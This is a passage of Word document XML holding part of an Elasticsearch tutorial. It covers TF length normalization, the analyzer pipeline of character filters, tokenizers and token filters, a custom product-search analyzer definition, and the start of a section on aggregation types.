    <w:p w14:paraId="6A4F9465" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    Same raw frequency but much longer document → lower TF score</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09FCD969" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    (b=0.75 means length normalization partially applied)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="442D4824" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1835735C" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Query for "elasticsearch database":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55974193" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    Document about ONLY Elasticsearch: both terms high TF → high score</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26BB843D" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    Wikipedia article mentioning both briefly: low TF → lower score</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02CCD7DA" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    Even if Wikipedia article is longer and has more total occurrences</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="078188CF" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The analyzer pipeline — text processing before indexing:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F6A330A" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7834B5D3" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Analyzer: character filter → tokenizer → token filters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1930613E" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F"/>
    <w:p w14:paraId="700F53DF" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Character filter: pre-process raw text</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="171195BD" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  html_strip: removes HTML tags (&lt;b&gt;hello&lt;/b&gt; → hello)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18AA33BA" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  mapping: replace characters (&amp;amp; → &amp;, ½ → 1/2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="548F25A9" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12A49BFD" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Tokenizer: split text into tokens</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5000F959" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  standard: split on whitespace/punctuation, lowercase</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="506AAD43" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    "Hello, World!" → ["hello", "world"]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2785CCB1" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  whitespace: split only on whitespace</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="530A649D" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    "Hello, World!" → ["Hello,", "World!"]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50C2AB5C" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  ngram: generate character n-grams</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5734B778" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    "fox" (min=2, max=3) → ["fo", "ox", "fox"]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C6F68A3" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    Useful for: partial word search, autocomplete</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="790DFA38" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  edge_ngram: n-grams from the start of each token</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="284541B6" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    "elasticsearch" (min=2, max=10) → ["el", "ela", "elas", ..., "elasticsea"]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03F6B744" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    Used for: prefix autocomplete</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AE15E82" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22F35A8C" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Token filters: modify tokens post-tokenization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CE584F9" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  lowercase: "Quick" → "quick"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C2B35AD" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  stop: remove stop words ("the", "and", "is" → removed)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60B6F301" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  stemmer: reduce to root form</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6595604D" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    english stemmer: "jumping" → "jump", "foxes" → "fox"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E9C5C3D" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    Used for: finding documents regardless of word form</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F8B6A13" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  synonym: expand synonyms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6271338A" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    "quick" → also index as "fast", "rapid"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BD330C4" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    Enables: search for "fast" finds documents containing "quick"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60029DCD" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  asciifolding: normalize Unicode to ASCII</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F6CB011" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    "café" → "cafe", "naïve" → "naive"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67AB59E9" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33A52267" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:lastRenderedPageBreak/>
        <w:t>Example: custom analyzer for product search</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61258C54" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  PUT /products</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78855438" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DFCE327" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    "settings": {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59A31DEB" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">      "analysis": {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61BF9689" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">        "analyzer": {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DFF01A1" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">          "product_analyzer": {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AEE3AA2" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">            "type": "custom",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="704C14B7" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">            "tokenizer": "standard",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31C3B5B4" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">            "filter": ["lowercase", "stop", "english_stemmer", "synonym_filter"]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C1E92BB" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">          },</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BEFEFB0" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">          "autocomplete_analyzer": {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ECB3863" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">            "type": "custom",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="153EF4C6" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">            "tokenizer": "standard",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B411C5C" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">            "filter": ["lowercase", "edge_ngram_filter"]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BE9B362" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">          }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F93BF1F" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">        },</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7217E04D" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">        "filter": {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1904D439" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">          "edge_ngram_filter": {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="694E580F" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">            "type": "edge_ngram",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D9530FB" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">            "min_gram": 2,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F84FED9" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">            "max_gram": 20</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C31B9CE" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">          },</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AB1C7AF" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">          "synonym_filter": {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41467917" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">            "type": "synonym",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47A02C24" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">            "synonyms": ["tv, television", "laptop, notebook"]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66CA312D" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">          }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75CD6BDA" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64AF8899" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">      }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D183FE8" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66587774" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AEB849D" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C5B1F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Elasticsearch Aggregations — Analytics at Scale</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="684B7551" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Elasticsearch's aggregation framework enables complex analytics directly in the search engine:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31E08F0D" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EDCAB69" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Aggregation types:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42A88BC6" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F"/>
    <w:p w14:paraId="57070059" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Metric aggregations (compute values over a set of documents):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42A532DE" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  avg, sum, min, max, stats (all five at once)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="569D5500" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  cardinality (approximate distinct count via HyperLogLog)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CD2BF7B" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  percentiles (approximate via TDigest: p50, p95, p99)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C08D3C2" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  top_hits (return top N matching documents for each bucket)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29B09FE8" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77F34671" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Bucket aggregations (group documents into buckets):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AE261F9" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  terms: group by field value (like GROUP BY)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69D57049" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    "top 10 product categories by order count"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C4190C3" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  date_histogram: group by time intervals</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A5B666D" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    "order count by day/week/month"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F75386A" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  range: group into explicit ranges</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F022C07" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    "price distribution: 0-50, 50-100, 100-500, 500+"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="015FC324" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  histogram: group by numeric intervals</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51CDF134" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    "response time distribution in 100ms buckets"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64AB2969" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  filters: multiple filter buckets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15609E6D" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    "count of: successful, failed, timeout requests"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36AA8A0C" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  geo_distance: group by distance from a point</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="477ECF04" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
